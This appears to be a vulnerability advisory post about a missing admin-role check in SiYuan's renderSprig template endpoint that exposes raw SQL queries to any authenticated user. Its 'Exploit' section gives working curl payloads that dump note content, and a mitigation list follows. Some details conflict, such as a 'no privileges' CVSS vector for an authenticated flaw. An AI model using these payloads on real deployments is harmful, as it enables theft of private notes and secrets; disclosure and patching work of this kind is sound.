Listen to this Post
The vulnerability exists in the `/api/template/renderSprig` endpoint due to missing admin role verification. In kernel/api/router.go, every sensitive endpoint uses both `model.CheckAuth` and model.CheckAdminRole, but `renderSprig` only implements model.CheckAuth. The endpoint calls `model.RenderGoTemplate` from kernel/model/template.go, which registers SQL functions from kernel/sql/database.go. Specifically, the `querySQL` function is added to the template function map, allowing execution of raw SELECT statements without any additional role verification. This means any authenticated user, including those with Publish Service Reader roles, can call this endpoint and execute arbitrary SQL queries against the SiYuan workspace database. The vulnerability enables attackers to exfiltrate all note content, metadata, document hierarchy, tags, custom attributes, and block information. The flaw exists because the endpoint registration omitted the `model.CheckAdminRole` middleware that protects all other data-accessing endpoints, creating a privilege escalation path from any authenticated user to full database read access .
Platform: SiYuan PKMS
Version: before 3.1.16
Vulnerability: Missing Admin Check
Severity: CRITICAL (9.8)
Date: Dec 12 2024
Prediction: Patch already available
What Undercode Say:
Analytics
The vulnerability received a CVSS score of 9.8 (Critical) with vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, indicating network attack vector, low complexity, no privileges required, no user interaction, and high impact on confidentiality, integrity, and availability . This CVE is part of a broader set of SiYuan vulnerabilities disclosed in December 2024, including arbitrary file read (CVE-2024-55657), path traversal (CVE-2024-55658), arbitrary file write (CVE-2024-55659), and multiple SQL injection issues in versions 3.1.11 . The affected component is the template rendering engine’s Sprig integration, which improperly exposes database functions to template contexts .
Exploit:
Environment setup
docker run -d --name siyuan -p 6806:6806 \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
Step 1: Login and retrieve API token
curl -s -X POST http://localhost:6806/api/system/loginAuth \
-H "Content-Type: application/json" \
-d '{"authCode":"test123"}' -c /tmp/siy.cookie
sleep 15
TOKEN=$(curl -s -X POST http://localhost:6806/api/system/getConf \
-b /tmp/siy.cookie -H "Content-Type: application/json" -d '{}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['data']['conf']['api']['token'])")
Step 2: Execute SQL as non-admin user (count blocks)
curl -s -X POST http://localhost:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{querySQL \"SELECT count() as n FROM blocks\" | toJson}}"}'
Full note dump
curl -s -X POST http://localhost:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{range $r := (querySQL \"SELECT hpath,content FROM blocks LIMIT 100\")}}{{$r.hpath}}: {{$r.content}}\n{{end}}"}'
Protection from this CVE
- Upgrade to SiYuan version 3.1.16 or later immediately
- Implement proper role-based access control by adding `model.CheckAdminRole` middleware to all sensitive endpoints
- Restrict template function registration to prevent exposing database functions to template contexts
- Apply principle of least privilege for database connections used by application
- Monitor API access logs for unusual `/api/template/renderSprig` requests
- Implement web application firewall rules to detect and block suspicious SQL patterns in template parameters
- Conduct security audit of all endpoints to ensure consistent authorization checks
Impact
Any authenticated user with a valid API token or Publish Service Reader account can dump all note content and document hierarchy from the workspace, exfiltrate tags, custom attributes, block IDs, and timestamps, search notes for stored passwords, API keys, or personal data, and enumerate all notebooks and their structure. This is especially severe in shared or enterprise deployments where lower-privilege accounts should not have access to other users’ notes. The vulnerability effectively bypasses all read access controls, exposing the entire knowledge base to any authenticated user .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

